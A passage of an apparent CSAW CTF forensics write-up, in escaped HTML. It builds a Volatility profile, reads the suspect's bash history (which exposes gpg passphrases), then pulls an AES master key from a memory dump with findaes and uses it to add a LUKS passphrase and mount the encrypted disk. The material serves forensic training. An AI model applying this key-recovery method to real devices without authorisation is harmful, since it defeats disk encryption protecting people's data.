&lt;p&gt;zip Ubuntu1604.zip module.dwarf /boot/System.map-4.4.0-72-lowlatency&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Zip the 2 files&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/volatility&lt;span class=&#34;comment&#34;&gt;# zip Ubuntu1604-low.zip module.dwarf /boot/System.map-4.4.0-72-lowlatency&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  adding: module.dwarf (deflated 89%)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  adding: boot/System.map-4.4.0-72-lowlatency (deflated 79%)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now just leave our ubuntu container. we finished the 1st step of the challenge and you learn how to make a cool &amp;amp; custom linux profile! Now you can copy this zip file to  &lt;code&gt;/plugins/overlays/linux/&lt;/code&gt;  directory in your volatility environment.&lt;/p&gt;
&lt;p&gt;Sanity Check please ! Let’s list all the ubuntu profiles available!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;check the availability of the profile&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ vol.py --info | grep -i ubuntu &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;LinuxUbuntu1604-lowx64     - A Profile &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; Linux Ubuntu1604-low x64&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Cool! we found our new profile recognized by volatility ! Now it’s time to try use it.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Test the new profile&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ vol.py -f memory.raw --profile=LinuxUbuntu1604-lowx64 linux_banner    &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Linux version 4.4.0-72-lowlatency (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) &lt;span class=&#34;comment&#34;&gt;#93-Ubuntu SMP PREEMPT Fri Mar 31 15:25:21 UTC 2017 (Ubuntu 4.4.0-72.93-lowlatency 4.4.49)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo!! Our profile is ready to work! Let’s start the investigation now&lt;br&gt;
I started checking the bash history!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Bash History&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol.py -f memory.raw --profile=LinuxUbuntu1604-lowx64 linux_bash        &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Pid      Name       Command Time             Command&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;-------- ---------- -----------------------  -------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-04-14 07:58:36 UTC  &lt;span class=&#34;built_in&#34;&gt;history&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-04-14 07:58:36 UTC  apt-get install linux-image-4.4.0-72-lowlatency linux-headers-lowlatency&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-04-14 07:58:36 UTC  reboot&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-04-14 07:58:36 UTC  apt-get insta&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-04-14 07:59:07 UTC  &lt;span class=&#34;built_in&#34;&gt;history&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:04:44 UTC  apt-get install lynx gnupg&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:06:54 UTC  nano /etc/fstab&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:06:58 UTC  nano /etc/crypttab&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:07:08 UTC  &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; /mnt/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:07:29 UTC  &lt;span class=&#34;built_in&#34;&gt;cp&lt;/span&gt; -R /media/sf_DUMP/dir* .&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:07:38 UTC  ping 8.8.8.8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:09:14 UTC  gpg --quick-gen-key &lt;span class=&#34;string&#34;&gt;&amp;#x27;Troll &amp;lt;abuse@nothere.com&amp;gt;&amp;#x27;&lt;/span&gt; rsa4096 cert 1y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:09:49 UTC  lynx -accept_all_cookies &lt;span class=&#34;string&#34;&gt;&amp;quot;https://www.google.com/?=password+porno+collection&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:10:27 UTC  gpg --&lt;span class=&#34;built_in&#34;&gt;yes&lt;/span&gt; --batch --passphrase=1m_4n_4dul7_n0w -c findme.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:10:37 UTC  lynx -accept_all_cookies &lt;span class=&#34;string&#34;&gt;&amp;quot;https://www.google.com/?=password+troll+memes&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:11:04 UTC  gpg --&lt;span class=&#34;built_in&#34;&gt;yes&lt;/span&gt; --batch --passphrase=Troll_Tr0ll_TrOll -c end.zip&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:11:20 UTC  nano dir1/dic_fr_l33t.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:11:28 UTC  &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; findme.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:11:35 UTC  &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; -rf dir1/&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    1229 bash       2017-05-05 12:11:55 UTC  &lt;span class=&#34;built_in&#34;&gt;dd&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt;=/dev/sdb of=/media/sf_DUMP/forensic.img bs=2048&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s analyse this history together to understand what is going on here!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The user install low-latency kernel&lt;/li&gt;
&lt;li&gt;install lynx : a terminal-based web browser for all Linux distributions&lt;/li&gt;
&lt;li&gt;edit the /etc/fstab.&lt;/li&gt;
&lt;li&gt;edit /etc/crypttab&lt;/li&gt;
&lt;li&gt;copy the directories from media (it can be a flash) partition to  &lt;code&gt;/mnt/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Check the connectivity by pinging the DNS server of google (I used to do the same test :3)&lt;/li&gt;
&lt;li&gt;generate a key with gpg using rsa4096. Something will be encrypted in the next commands! I am sure&lt;/li&gt;
&lt;li&gt;use lynx to search for porno password collection! mmm He want a premium account&lt;/li&gt;
&lt;li&gt;Encrypt  &lt;code&gt;findme.txt&lt;/code&gt;  file using gpg !! This will generate an encrypted file  &lt;code&gt;findme.txt.gpg&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Search for troll password!&lt;/li&gt;
&lt;li&gt;Encrypt  &lt;code&gt;end.zip&lt;/code&gt;  with gpg again! We have  &lt;code&gt;end.zip.gpg&lt;/code&gt; , another encrypted file!&lt;/li&gt;
&lt;li&gt;edit a file text called  &lt;code&gt;dic_fr_l33t.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;remove  &lt;code&gt;findme.txt&lt;/code&gt; . I guess we need to recover this file !&lt;/li&gt;
&lt;li&gt;remove the directory that contains the  &lt;code&gt;dic_fr_l33t.txt&lt;/code&gt;  file&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;/etc/fstab: is a configuration table designed to ease the burden of mounting and unmounting file systems to a machine. It is a set of rules used to control how different filesystems are treated each time they are introduced to a system&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;The /etc/crypttab (encrypted device table) file is similar to the fstab file and contains a list of encrypted devices to be unlocked during system boot up. This file can be used for automatically mounting encrypted swap devices or secondary file systems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ok the encrypted disk contains a  &lt;code&gt;end.zip.gpg&lt;/code&gt;  and  &lt;code&gt;findme.text.gpg&lt;/code&gt; . These 2 files are the key of the task! The flag is on these files! So we need to decrypt to disk and mount it!&lt;/p&gt;
&lt;h2 id=&#34;decrypt-disk-and-mount-it&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#decrypt-disk-and-mount-it&#34;&gt;#&lt;/a&gt; Decrypt Disk and MOUNT IT&lt;/h2&gt;
&lt;p&gt;Dealing with the disk we require  &lt;code&gt;cryptsetup&lt;/code&gt;  --a tool to manage plain dm-crypt and LUKS encrypted volumes, to install it, use  &lt;code&gt;sudo apt install cryptsetup-bin&lt;/code&gt; .&lt;/p&gt;
&lt;p&gt;Analyzing the disk image to understand what we need to next!&lt;/p&gt;
&lt;p&gt;command  &lt;code&gt;cryptsetup luksDump forensic.img&lt;/code&gt;  will return some useful LUKS information:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;LUKS INFO&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;LUKS header information &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; forensic.img&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Version:        1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Cipher name:    aes&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Cipher mode:    ecb&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Hash spec:      sha1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Payload offset: 2048&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;MK bits:        128&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;MK digest:      a0 0c 4d c4 4a 53 5c 00 0c c3 33 63 13 5b 2c 41 8e a3 3f a9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;MK salt:        5e 84 10 01 a8 19 06 22 6a 7b 1b &lt;span class=&#34;built_in&#34;&gt;df&lt;/span&gt; 35 73 46 8e&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                0e 7e f4 68 b0 97 38 81 cf 6d 99 7c 22 82 bd 06&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;MK iterations:  117625&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;UUID:           61478c6d-b04e-4f1a-aff6-b4bb3a29cfbe&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 0: ENABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        Iterations:             507935&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        Salt:                   68 5e 9a ef 39 26 3a 09 3a a2 57 fa b8 a4 d9 6b&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                                65 81 49 63 d7 43 41 2a 0e 0a &lt;span class=&#34;built_in&#34;&gt;cd&lt;/span&gt; cb d7 94 ac 01&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        Key material offset:    8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        AF stripes:             4000&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 1: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 2: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 3: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 4: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 5: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 6: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 7: DISABLED&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;It is clear as day that once we have the master key --the one used to control the disk the way we want, we can add a key slot/passphrase.&lt;/p&gt;
&lt;p&gt;As said in the introduction, the master key must be loaded into the RAM, we know it is AES, so using  &lt;code&gt;findaes&lt;/code&gt;  tool &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9zb3VyY2Vmb3JnZS5uZXQvcHJvamVjdHMvZmluZGFlcy8=&#34;&gt;here&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Then, extract the downloaded zip file&lt;br&gt;
 &lt;code&gt;unzip findaes*.zip&lt;/code&gt; &lt;br&gt;
Compile it&lt;br&gt;
 &lt;code&gt;cd findaes* ; make&lt;/code&gt; &lt;br&gt;
And run it against the memory dump&lt;br&gt;
 &lt;code&gt;./findaes memory.raw&lt;/code&gt; &lt;br&gt;
And you get this!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;AES Finally !&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Found AES-128 key schedule at offset 0xad9f450:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8d 3f 52 7d e5 14 87 2f 59 59 08 95 8d bc 0e d1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Going further is a routinuous disk encryption operation, with the masterkey in hand, we can generate a new passphrase say  &lt;code&gt;1234&lt;/code&gt;  or  &lt;code&gt;p@ssw0rd&lt;/code&gt;  for us to access the content.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;MasterKey !&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -n &lt;span class=&#34;string&#34;&gt;&amp;quot;8d 3f 52 7d e5 14 87 2f 59 59 08 95 8d bc 0e d1&amp;quot;&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;tr&lt;/span&gt; -d &lt;span class=&#34;string&#34;&gt;&amp;quot; &amp;quot;&lt;/span&gt; | xxd -r -p  &amp;gt; masterkey.key&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cryptsetup luksAddKey --master-key-file=masterkey.key forensic.img                               &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Enter new passphrase &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; key slot:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Verify passphrase:&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s see if it is now placed as Key Slot 1!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;LUKS&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;cryptsetup luksDump forensic.img | grep Key.Slot&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 0: ENABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 1: ENABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 2: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 3: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 4: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 5: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 6: DISABLED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Key Slot 7: DISABLED&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;All good!&lt;br&gt;
Now, we mount it!&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;sudo cryptosetup luksOpen forensic.img mydata&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Enter passphrase for forensic.img: &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;mkdir ~/csaw&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;sudo mount /dev/mapper/mydata ~/csaw&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Just fill in your new passphrase in the previous step, and you’ll have it!&lt;/p&gt;
&lt;p&gt;If you got some permission concern while trying to access the mount point, just switch to root!&lt;/p&gt;
&lt;p&gt;After decrypting the disk and mounting it! We find 2 directories!  &lt;code&gt;dir2&lt;/code&gt;  and  &lt;code&gt;lost+found&lt;/code&gt; . OK I can say skip &amp;amp; ignore  &lt;code&gt;lost+found&lt;/code&gt;  directory. The  &lt;code&gt;dir2&lt;/code&gt;  is our target. Let’s get our flag man!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;test&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~/csaw/dir2$ &lt;span class=&#34;built_in&#34;&gt;ls&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;end.png    findme.txt.gpg      readme.txt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s check the readme.txt first, Just i am trying to be patient before attacking the  &lt;code&gt;findme.txt.gpg&lt;/code&gt;&lt;/p&gt;
